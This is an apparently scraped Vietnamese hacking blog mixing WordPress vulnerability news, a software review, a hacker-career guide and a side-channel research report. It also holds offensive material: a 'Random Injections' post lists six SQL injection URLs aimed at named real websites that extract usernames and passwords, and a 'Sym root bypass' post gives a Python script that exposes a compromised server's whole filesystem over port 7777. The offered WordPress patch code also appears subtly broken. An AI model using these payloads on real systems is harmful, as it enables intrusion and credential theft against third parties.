Keyz Cenly Blog

Lỗ hổng WordPress ảnh hưởng hơn 400.000 websites trên thế giới

<div dir="ltr" style="text-align: left;" trbidi="on">
<h3 style="box-sizing: border-box; margin: 0px; padding: 10px 0px 20px;" title="Lỗ hổng WordPress ảnh hưởng hơn 400.000 websites trên thế giới">
 Như SecurityDaily đã đưa tin ngày 03/09/2014, lỗ hổng nguy hiểm trong WordPress đang ảnh hưởng tới nhiều website của Việt Nam và rất nhiều các website của các tổ chức quan trọng trên thế giới. SecurityDaily đã thực hiện điều tra và phát hiện hơn 400.000 websites trên thế giới tồn tại lỗ hổng nguy hiểm này. Kết quả quét và thống kê từ công cụ quét lỗ hổng tự động của SecurityDaily cho thấy, hiện có 400.000 websites trên thế giới đang tồn tại lỗ hổng nguy hiểm. Một số lượng lớn các websites quan trọng của Anh, Mỹ, Brasil… đang có nguy cơ bị tấn công chiếm quyền điều khiển dựa trên việc khai thác lỗ hổng trong WordPress. <a href="http://securitydaily.net/wp-content/uploads/2014/09/gov.uk_.png"><img src="http://securitydaily.net/wp-content/uploads/2014/09/gov.uk_-700x322.png" /></a> Kết quả kiểm tra một website của chính phủ Anh Quốc Lỗ hổng cho phép hacker có thể tải về toàn bộ mã nguồn websites, đọc tập tin cấu hình hệ thống và truy cập thẳng đến cơ sở dữ liệu của website, chiếm quyền điều khiển toàn bộ website. <div style="text-align: left;">
Một số website của chính phủ các nước đang tồn tại lỗ hổng đã bị tin tặc tấn công và thay đổi giao diện <img src="http://securitydaily.net/wp-content/uploads/2014/09/betania.pe_.gov_.br_-700x363.png" />Giao diện một website của chính phủ Brasil bị tin tặc thay đổi. Rất nhiều trường đại học danh tiếng của Mỹ: Đại học Harvard, University of Florida, USG… cũng đang tồn tại lỗ hổng này: <img src="http://securitydaily.net/wp-content/uploads/2014/09/harvard-700x421.jpg" /> Hiện tại, SecurityDaily đã gửi cảnh báo tới các website chính phủ, các trường đại học lớn về việc tồn tại lỗ hổng nguy hiểm này. Một lần nữa, SecurityDaily khuyến cáo quản trị các website đang sử dụng wordpress nên thực hiện ngay các phương án sau để đảm bảo an ninh và khắc phục lỗ hổng:Kiểm tra website với công cụ kiểm tra tự động: <a href="http://tools.mvs.vn/">tools.mvs.vn</a>Cập nhật lên phiên bản mới nhất của WordPress.Tạm dừng các plugin, theme sau (tồn tại lỗ hổng) nếu đang sử dụng, bao gồm:Revolution Slider PluginCuckooTap ThemeIncredibleWP ThemeWordPress Ultimatum ThemeWordPress Ultimatum ThemeWordPress Ultimatum ThemeWordPress Avada ThemeWordPress Striking Theme & E-CommerceWordPress Striking Theme & E-CommerceRà soát lại toàn bộ các thư mục và tập tin trên website tránh việc website đã bị hacker khai thác và cài đặt backdoors lên hệ thống để tiếp tục xâm nhập. Các nhà phát triển website wordpress có thể vá trực tiếp lỗ hổng này bằng việc thêm add_action để kiểm tra kỹ biến GET["img"] trước khi xử lý, cụ thể như sau:</div>
<blockquote style="background-color: white; border-left-color: rgb(238, 238, 238); border-left-style: solid; border-left-width: 5px; box-sizing: border-box; color: #404040; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; font-weight: normal; line-height: 20px; margin: 0px 0px 20px; padding: 10px 20px; text-align: left;">
<pre style="background-color: whitesmoke; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; font-size: 13px; line-height: 1.428571429; margin-bottom: 10px; padding: 9.5px; white-space: pre-wrap; word-break: break-all; word-wrap: break-word;">function fixRevsliderExploit(){
        if(substr_compare($_GET["img"], ".php", -4, 4) === 0){
                die("Not found! ");
        }
}
add_action('wp_ajax_revslider_show_image', fixRevsliderExploit(), -1);
// Chi tiết: http://pastebin.com/k07msTHw</pre>
</blockquote>
<div style="text-align: right;">
Nguồn: SecurityDaily.Net </div>
</h3>
</div>

Lỗ hổng WordPress ảnh hưởng hơn 400.000 websites trên thế giới

Như SecurityDaily đã đưa tin ngày 03/09/2014, lỗ hổng nguy hiểm trong WordPress đang ảnh hưởng tới nhiều website của Việt Nam và rất nhiều...

Theo dõi hoạt động và sử dụng máy tính của bạn

<div dir="ltr" style="text-align: left;" trbidi="on">
(Thegioitinhoc.vn) - Có bao giờ bạn muốn biết bạn đã nhấp chuột và bấm trên bàn phím của bạn bao nhiêu lần trong một khoảng thời gian nào đó không? Tự đếm thì chắc là không thể dù bạn muốn, nhưng nếu muốn?! Hoàn toàn bạn sẽ làm được – nghĩa là bạn sẽ theo dõi hoạt động máy tính của mình, bao gồm các phím bấm, cú nhấp chuột, sử dụng băng thông và thời gian hoạt động của hệ thống với phần mềm WhatPulse. WhatPulse là một chương trình miễn phí cho phép quan sát thời gian hoạt động máy tính của bạn, số lượng các tổ hợp phím, sử dụng băng thông và số lần nhấp chuột trong một khoảng thời gian nhất định. WhatPulse đếm số lần bấm phím không giống như keylogger khác ghi lại thứ tự các phím được nhấn. Nó cũng lưu giữ lịch sử chi tiết của bao nhiêu công việc bạn đã thực hiện trên hệ thống máy tính của bạn trong một khoảng thời gian. WhatPulse là một chương trình đơn giản, sau khi tải về, cài đặt trong hệ thống của bạn và sẽ hoạt động trong thời gian thực. Chỉ cần nhấp vào biểu tượng chương trình trên desktop và bạn sẽ có được số liệu chính xác bao nhiêu lần bạn nhấp chuột, bao nhiêu lần sử dụng các phím cùng với một số thông tin khác mà bạn muốn biết. WhatPule cung cấp cho bạn bao gồm: - Tracks your clicks - Theo dõi nhấp chuột của bạn và cung cấp bản đồ sử dụng chuột của bạn. Nó cũng cho phép bạn xuất khẩu hoặc chia sẻ “nóng” bản đồ sử dụng chuột của bạn. <img border="0" height="548" src="http://i.imgur.com/zQTwHGP.jpg" width="640" /> - Tracks Internet Usage - Theo dõi việc sử dụng Internet của bạn và cũng có thể phát hiện ra tất cả các ứng dụng đang làm cho internet của bạn chậm do ăn lên băng thông của bạn. <img border="0" height="560" src="http://i.imgur.com/9LZ6XrZ.jpg" width="640" /> - Tracks your keyboard usage – Cung cấp bản đồ sử dụng bàn phím của bạn và theo dõi các phím bạn đã gõ. Bạn cũng có thể chia sẻ “nóng” bản đồ sử dụng phím với người thân đang sử dụng WhatPulse. <img border="0" height="561" src="http://i.imgur.com/lHmnqbw.jpg" width="640" /> - Monitors your network – Kiểm tra cường độ ứng dụng và cũng theo dõi đầu vào và ra băng thông của bạn. - Application Usage - WhatPulse cũng giữ sự theo dõi các ứng dụng được sử dụng nhiều nhất của bạn. WhatPulse sẽ gửi toàn bộ số liệu thống kê ghi nhận trên trang web mà bạn để giúp bạn “tự nhìn lại và phân tích cuộc sống trên máy tính” của bạn bất cứ lúc nào. Ngoài ra bạn cũng có thể chia sẻ những thống kê này với người khác. Các tùy chọn 'Settings' cho phép bạn thiết đặt chương trình chạy lúc Windows khởi động, kiểm tra phiên bản mới tự động, kích hoạt chế độ portable, ẩn cửa sổ pop-up và nhiều hơn nữa. Trong thử nghiệm, chương trình làm việc tốt trên Windows 8.1, nó hoạt động trong thời gian thực và không ảnh hưởng đến hiệu suất hệ thống. WhatPulse là một chương trình tốt đẹp và đáng tin cậy theo dõi và ghi lại các chi tiết về thói quen máy tính của bạn cùng với các số liệu thống kê như địa chỉ IP, tốc độ tải xuống/tải lên, giao diện mạng, tổng số lượng các lần khởi động lại, sử dụng băng thông và sử dụng ứng dụng. Một chương trình khá thú vị cho bất kỳ ai khi sử dụng máy tính! Bạn xem thêm và tải chương trình về tại: <a href="http://whatpulse.org/">http://whatpulse.org/</a></div>

Theo dõi hoạt động và sử dụng máy tính của bạn

(Thegioitinhoc.vn) - Có bao giờ bạn muốn biết bạn đã nhấp chuột và bấm trên bàn phím của bạn bao nhiêu lần trong một khoảng thời gian nào đ...

Để trở thành Hacker

<div dir="ltr" style="text-align: left;" trbidi="on">
Bài viết này sẽ tách ra làm 4: Script Kiddy Level, Advanced Attacker Level, Developer Level, Researcher Level Nội dung bài viết phản ánh quan điểm của tác giả, và hoàn toàn rộng mở cho mọi người comment góp ý chỉnh sửa, comment góp ý nào được nhiều người Like nhất sẽ được cân nhắc bổ sung, thay thế vào bài viết ( kèm credits ). Bài viết cũng cố gắng sử dụng các ngôn từ mà các bạn trẻ hay dùng trong giới Hắc-cờ VN nên có thể các từ này không chính xác về mặt kỹ thuật, vui lòng không bắt bẻ Về bài viết này: Mức độ: cực kỳ căn bản Đối tượng: biết xài máy tính thông thạo Yêu cầu cần có sẵn: 
<blockquote class="tr_bq">
Biết bật máy tính Biết lướt web Biết search bằng Google Biết cài & gỡ chương trình. Hay tóm gọn lại là biết cài Win =)) Biết tiếng Anh mức độ Đọc rất tốt, viết người ta hiểu được, nghe nói thì tạm tạm nếu có thêm chân tay chỉ trỏ ( ếu biết đi chỗ khác chơi ) </blockquote>
 
Yêu cầu về tố chất: 
<blockquote class="tr_bq">
Đang có hy vọng trở thành hacker Chịu khó nghịch Chịu khó tìm hiểu Không lười Không hy vọng một đêm thành hacker :v ( các cháu hy vọng điều này thì các cháu đi coi phim đi cho thoả mãn ) —————————————————</blockquote>
 Script Kiddy là gì ? Là mức độ căn bản nhất của một người đang có hy vọng thành hacker. Những người này thường sử dụng máy tính ở mức thông thạo, tức là khá hơn người dùng bình thường ( đến dùng còn ếu thạo thì đừng mong hắc hiếc gì ), thường hay đi hỗ trợ các chị em sửa máy khi được nhờ giúp giải quyết một cái máy có vấn đề. Ngoài các lúc đi hỗ trợ gái ( hoặc trai :v ) sửa máy thì thời gian còn lại là lên mạng đọc Tut, và làm theo với hy vọng sớm thành hacker, làm theo các tut trong tình trạng là ếu hiểu mền đang làm gì và lý do tại sao phải làm bước A B C, và đa phần là cũng ếu tự thắc mắc luôn, các em mà không biết tự thắc mắc kiểu "tại sao phải làm bước A B C mà không phải làm các bước X Y Z” thì coi như không có tố chất lên các level tiếp theo, mãi mãi chỉ có đi sửa máy cho gái ( hoặc trai :v ) và làm theo Tut để loè gái. Còn các em tự biết hỏi “tại sao…” , “tại sao …” và biết lên mạng search và tìm hiểu thì có cơ hội lên các level tiếp theo mà gần nhất là Attacker :) Script Kiddy cần có kiến thức gì? Dưới đây là một danh sách các kiến thức mà Script Kiddy cần có để được coi là đạt mức độ này và có tiềm năng lên các level cao hơn Script Kiddy Level Basic: - Biết xài Windows - Biết cài/gỡ chương trình trên Windows - Biết dùng các công cụ quản lý HDH Windows - Biết cài HDH Windows - Biết xử lý các sự cố trong quá trình sử dụng HDH Windows - Biết xài bộ Office ở mức độ thông thạo, tức là làm được cái văn bản đẹp, slide powerpoint ngon, thuộc làu và dùng tốt hầu hết các công thức Excel. Bèo bèo thì cũng phải có được cái bằng A & B Tin học của VN cấp :v ( ý là kiến thức phải đạt cỡ đó ) - Biết hầu hết các trò chỉnh sửa, tối ưu windows như chỉnh msconfig, chỉnh registry, chỉnh startup, chỉnh boot option… - Biết xài Windows Command Line ( cmd.exe ) - Biết xài file Batch ( .Bat ) - Biết máy hư phần cứng thì phải thay cái gì. Nói chung máy hư thì ít khi phải mang ra tiệm nhờ sửa máy :v - Biết mấy trò nghịch phá trên máy Windows như lock registry, lock task manager, lock desktop wallpaper Script Kiddy Level Medium: - Biết cấu hình modem ADSL để vô mạng - Biết setup cho một máy đơn có thể vô mạng internet - Biết lập mạng Lan, mạng Wifi - Biết lắp ráp nguyên một cái máy tính để bàn từ các thành phần rời ( hề hề vụ này giờ chắc ít người biết :v ). Hoặc là biết cách tháo cái Laptop ra và gắn lại mà vẫn chạy ngon :v - Biết quản lý share windows share file - Biết quản trị mạng căn bản & nâng cao ( đi học mấy khoá Quản trị mạng của mấy trung tâm tin học cũng được ) Script Kiddy Level Advanced: - Biết lập trình căn bản bằng một ( hoặc nhiều ) ngôn ngữ trong nhóm sau: Java, C/C++, Visual Basic, C#. Căn bản tức là viết được một chương trình cho Desktop PC làm công việc như là quản lý một kho sách, quản lý một quán cafe. Cao hơn làm một chương trình Chat giữa 2 máy tính thông qua mạng LAN. Kiểu kiểu như vậy. Thường Script Kiddy nào lập trình được mấy món kể trên thì bắt đầu thấy sáng mắt ra và tự nhìn thấy tương lai rõ ràng hơn :) - Biết lập trình Web căn bản bằng các ngôn ngữ sau: PHP, Javascript, HTML, CSS, SQL. Căn bản là tự lập trình được một trang web bán hàng đơn giản ( tự lập trình chớ không phải là tải mấy cái source có sẵn rồi về cài lên, việc cài thì đám Script Kiddy Level Medium dư sức làm ). Nâng cao thì có thể biết thêm các thứ như Bootstrap, HTML5, jQuery, biết một Web Framework như Zend, Symphony… . Cao hơn nữa thì biết chỉnh sửa các web mã nguồn mở như Joomla, Wordpress - Biết xài một số ngôn ngữ lập trình tiện ích như: Autoit, Python, Perl, Unix Bash Shell - Biết xài Linux. Biết xài ở đây nghĩa là “xài linux dễ dàng và tự nhiên như xài windows”, có thể coi lại phần Script Kiddy Level Basic chỗ nói về Windows - Biết đọc & hiểu các Tut hướng dẫn Hack bằng tiếng Việt lẫn tiếng Anh, và hầu hết là làm theo thành công ( đôi lúc không thành công thì cũng không sao :v ). Còn nếu hầu hết mà làm theo không thành công, thì rất tiếc, tới level này mà làm theo Tut có sẵn mà đa phần không thành công thì chứng tỏ không có tố chất để thành Hắc-cờ, một số điều cần phải có tố chất bẩm sinh, nên đừng buồn, tới level này thì cũng có thể thấy tương tai kiếm ăn với ngành CNTT được rồi  
 - Hiểu các Tut nói gì, khi làm theo mà gặp khó khăn, biết phải search cái gì để giải quyết khó khăn đó, và làm theo Tut thành công - Tự mày mò thử nghiệm hack cái gì đó thành công, và tự viết Tut hướng dẫn lại cho người khác cách hack - Có một lượng fan nho nhỏ :v và giúp định hướng được cho một số người đạt được các thành công nho nhỏ như mình và đạt được Script Kiddy Level Advanced như mình. Những nguời tới được mức này thì coi như đã đủ tố chất và tiềm năng để lên Advanced Attacker Level. Những người này cũng thường nhìn thấy được con đường có thể kiếm ăn bằng nghề làm việc với công nghệ ( đa phần là cũng kiếm ăn được chút chút rồi ). 
 
<div style="text-align: right;">
Theo xnohat - HVA </div>
</div>

Để trở thành Hacker

Bài viết này sẽ tách ra làm 4: Script Kiddy Level, Advanced Attacker Level, Developer Level, Researcher Level Nội dung bài viết phản ánh ...

[TUT] SQL dạng HTML

Link Download http://www.mediafire.com/?6hh2ykae8xpuq2q Hoặc https://www.box.com/s/3m0xluf10xdhcdw95qzu

Bug LFI + FCKeditor

Random Injections

<div dir="ltr" style="text-align: left;" trbidi="on">
1 Mã: <blockquote class="tr_bq">
http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username, 0x3b,password),5,6,7,8,9,10 from users_tbl--</blockquote>
 2/ Mã: <blockquote class="tr_bq">
http://www.nbjm-sprayer.com/products.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1 9,20,21,22,23 from user_table--</blockquote>
 3/ Mã: <blockquote class="tr_bq">
http://www.mcdonaldlawoffice.net/story.php?articleid=-8 UNION SELECT 1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from users--</blockquote>
 4/ Mã: <blockquote class="tr_bq">
http://localtime.biz/product.php?cat_id=-1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b, pwd,0x3c,0x62,0x72,0x3e),4 from users--</blockquote>
 5/ Mã: <blockquote class="tr_bq">
http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--</blockquote>
 6/ Mã: <blockquote class="tr_bq">
http://www.media4world.de/mini_d/list_art.php?shop=-5 UNION SELECT group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from user--</blockquote>
</div>

Random Injections

1 Mã: http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version...

Đánh cắp mã máy tính chỉ với một cái chạm tay

<div dir="ltr" style="text-align: left;" trbidi="on">
 <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5QE36a2fyNjeGbrabe2tV1l1ITxfTOAZMiZXD1G7xjoEuI-uuVSjUXUy9llP0fsY5v_ObSzUYrNzoN77IraeHlBo0PMqoky_or9hLHF2aBehXfFmPRKTWPgjwSDesqLvYTTZRPdILdqEe/s1600/PC-700x347.png"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5QE36a2fyNjeGbrabe2tV1l1ITxfTOAZMiZXD1G7xjoEuI-uuVSjUXUy9llP0fsY5v_ObSzUYrNzoN77IraeHlBo0PMqoky_or9hLHF2aBehXfFmPRKTWPgjwSDesqLvYTTZRPdILdqEe/s1600/PC-700x347.png" width="640" /></a> Phim khoa học viễn tưởng đã trở thành một hình thức giải trí cho cộng đồng, nhưng những ý tưởng trong phim luôn là một vấn đề liên hệ với cuộc sống thực. Cũng giống như trong một bộ phim khoa học viễn tưởng, hiện người ta có thể chạm tay vào một chiếc máy tính xách tay để lấy thông tin các khóa mật mã trên máy tính. Đó là phương pháp mới mà một nhóm các chuyên gia bảo mật máy tính tại Đại học Tel Aviv (Israel) đã đưa ra. CÁCH TẤN CÔNG HỆ THỐNG MÃ HÓA Có nhiều cách tấn công hệ thống mã hóa khác nhau. Một mặt, lỗ hổng bảo mật và điểm yếu trong bản thân các thuật toán mã hóa giúp nó có thể tìm ra các khóa mật mã. Mặt khác, có những lỗ hổng và điểm yếu trong chính bản thân máy tính làm cho nó dễ dàng bị tấn công hơn. CHẠM VÀ ĐE DỌA BẤT CỨ MÁY TÍNH NÀO Theo Eran Tromer, Daniel Genkin và Itamar Pipman, các chuyên gia bảo mật máy tính tại Đại học Tel Aviv, sử dụng một thủ thuật đơn giản là đủ để tin tặc chuyên nghiệp đạt được quyền truy cập vào hàng ngàn các khóa mã hóa chỉ qua cái chạm vào khung của máy tính. Truy cập vào các khóa mã hóa có thể được sử dụng để tạo ra hàng trăm chữ ký số người dùng giả mạo khi tạo mật khẩu, ký kết hợp đồng, hoặc có lẽ quan trọng nhất là sử dụng cho thẻ ghi nợ tín dụng và trực tuyến. Để tấn công bất kỳ máy tính, tất cả điều bạn cần làm là đeo vào cổ tay một dây đeo kỹ thuật số đặc biệt và chạm vào phần tiếp xúc của hệ thống. Dây đeo cổ tay sẽ đo lường tất cả những thay đổi nhỏ trong những xung đột năng điện mặt đất mà có thể tiết lộ các khóa mã hóa, chẳng hạn như 4096-bit RSA. Thực tế, trong một số trường hợp, bạn thậm chí không cần phải chạm vào hệ thống trực tiếp với hai bàn tay trần của bạn. Bạn có thể đánh chặn các khóa mã hóa từ kết nối mạng đính kèm với cáp video. Một kẻ tấn công có thể đo tín hiệu bằng cách chạm vào kim loại tiếp xúc trên khung gầm của máy tính với một dây đơn giản, hoặc thậm chí với một bàn tay trần. Các tín hiệu cũng có thể được xác định bằng điểm kết thúc từ xa của Ethernet, VGA hoặc cáp USB. Các nhà nghiên cứu cũng lưu ý rằng cuộc tấn công này thực hiện tốt hơn trong thời tiết nóng, do sức đề kháng kém của các ngón tay ướt đẫm mồ hôi. Nhóm nghiên cứu sẽ trình bày nghiên cứu của họ trong một cuộc nói chuyện mang tên “Get Your Hands off my laptop: Physical Side-Channel Key-Extraction attacks on PCs” tại Hội thảo về mã hóa phần cứng và hệ thống nhúng 2014 (Ches 2014) tại Hàn Quốc ngày 23 tháng 9 tới. Nhóm nghiên cứu có thể lấy được khóa từ nhiều máy tính thử nghiệm chạy một phần mềm mã hóa mã nguồn mở phổ biến được gọi là GnuPG, thực hiện các tiêu chuẩn OpenPGP. Kết quả cuối cùng là: Sự phân biệt giữa các dấu hiệu phổ của khóa bí mật RSA khác nhau (ký kết hoặc giải mã) Trích xuất đầy đủ các phím giải mã, bằng cách đo khả năng khung gầm của máy tính xách tay trong quá trình giải mã một bản mã lựa chọn. Các nhà nghiên cứu cũng đã thực hiện thành công cuộc tấn công này bằng cách sử dụng một điện thoại thông minh kết nối Ethernet để che chắn thông qua cổng tai nghe của nó. Tuy nhiên, tin tốt là không có gì phải lo lắng về những người xa lạ có thể đánh cắp dữ liệu của bạn, bởi vì kỹ thuật này chủ yếu tập trung vào phần mềm mã hóa GnuPG. Hiện đã có một bản vá sẵn sàng để sửa chữa vấn đề, hạn chế những ảnh hưởng. <div style="text-align: right;">
Theo THN</div>
</div>

Đánh cắp mã máy tính chỉ với một cái chạm tay

Phim khoa học viễn tưởng đã trở thành một hình thức giải trí cho cộng đồng, nhưng những ý tưởng trong phim luôn là một vấn đề liên hệ với c...

Log file của cPanel

<div dir="ltr" style="text-align: left;" trbidi="on">
Các file log của cPanel được lưu tại thư mục /usr/local/cpanel/logs/, gồm có các file chính sau: access_log: log truy cập của cPanel và WHM. error_log: log các lỗi của cPanel và WHM. login_log: log các đăng nhập cPanel và WHM. Ngoài ra cPanel còn lưu log hệ thống tại thư mục /var/log/, gòm có bandwidth: log lưu lượng băng thông sử dụng của server. chkservd.log: log hệ thống theo dõi các dịch vụ trên server. clamav: log của hệ thống quét virus clamav. cpupdate: log tác vụ nâng cấp của cPanel. exim_mainlog: log gửi/nhận thư của hệ thống mail exim. exim_rejectlog: log các kết nối bị từ chối của exim. exim_paniclog: log các lỗi của exim. maillog: log các đăng nhập và kết nối gửi/nhận thư của các dịch vụ mail (pop3/imap). xferlog: log các kết nối qua FTP. Ngoài ra, log của các tài khoản được lưu trữ trong thư mục /usr/local/cpanel/domlogs/ và log của Apache được lưu tại /usr/local/apache/logs/</div>

Log file của cPanel

Các file log của cPanel được lưu tại thư mục /usr/local/cpanel/logs/, gồm có các file chính sau: access_log : log truy cập của cPanel và WH...

Sym root bypass open port nếu server cho chạy python

<div dir="ltr" style="text-align: left;" trbidi="on">
Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa dùng lệnh python -h xem có trả về kết quả gì ko nè. <a href="http://www.blogger.com/null"></a> Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py <blockquote class="tr_bq">
#!/usr/bin/env python# Bypass for (c) 2013import SimpleHTTPServerimport SocketServerimport osport = 7777if __name__=='__main__':os.chdir('/')Handler = SimpleHTTPServer.SimpleHTTPRequestHandlerhttpd = SocketServer.TCPServer(("", port), Handler)print("Now open this server on webbrowser at port : " + str(port))print("example: http://maho.com:" + str(port))httpd.serve_forever()</blockquote>
 Sau đó chạy nó python capuchino.py rồi kiểm tra kết quả :victim:7777 Cách này có thể giấu đc kết quả thực hiện sym trên server</div>

Sym root bypass open port nếu server cho chạy python

Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa dùng lệnh python -h xem có trả về kết quả gì ko nè. Nếu có chạ...